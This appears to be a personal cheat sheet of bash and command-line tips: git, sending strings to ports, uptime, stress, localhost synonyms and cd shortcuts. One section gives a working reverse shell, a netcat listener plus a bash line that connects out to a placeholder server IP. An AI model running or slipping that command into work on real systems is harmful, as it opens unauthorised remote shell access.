## bash

As a Linux developer you need a strong command line game. `bash` is ubiquitous, and a powerful language in itself, without resorting to something like Python.

### git

`git` is awesome on the command line and pretty much essential. Use it to manage your chores. See [how to undo almost anything with git](https://github.blog/2015-06-08-how-to-undo-almost-anything-with-git/).

### Send a string to an IP/port

```bash
(echo hello; sleep 1) | telnet 127.0.0.1 80
echo hello > /dev/tcp/127.0.0.1/80
echo hello | nc localhost 80
```

### Reverse shell

```bash
# server
nc -knvlp 3389

# client
bash -i >& /dev/tcp/server_ip/3389 0>&1
```

### Target everything but one file

```bash
git add !(unit.md)
```

### Print a random line from a file

```bash
shuf -n 1 readme.txt
```

### Print epoch seconds

From bash 5.

```bash
echo $EPOCHREALTIME
1614870873.574544

echo $EPOCHSECONDS
1614870876
```

### uptime

The three load average values are 1, 5 and 15 minutes.

```bash
uptime
15:29:28 up 20:23, 0 users, load average: 5.08, 1.49, 0.51
```

### stress

Stress your system in different ways.

```bash
stress --cpu 8
```

### Print number of processors

```bash
echo $(nproc)
```

### Synonyms for localhost

```bash
localhost
127.0.0.1
127.0.0.2
127.0.0.3
127.1
0.0.0.0
0 # wut
```

### Move a file out of the way

```bash
mv {,_}.bash_history
```

### Repeat a command

```bash
watch -d ip a
```

### `pushd` equivalent

I use this all the time. Rather than `pushd` and `popd` to navigate around the file system:

```bash
# Navigate to new dir
cd ~/deanturpin.gitlab.io/content/post

# Return whence you came
cd -
```
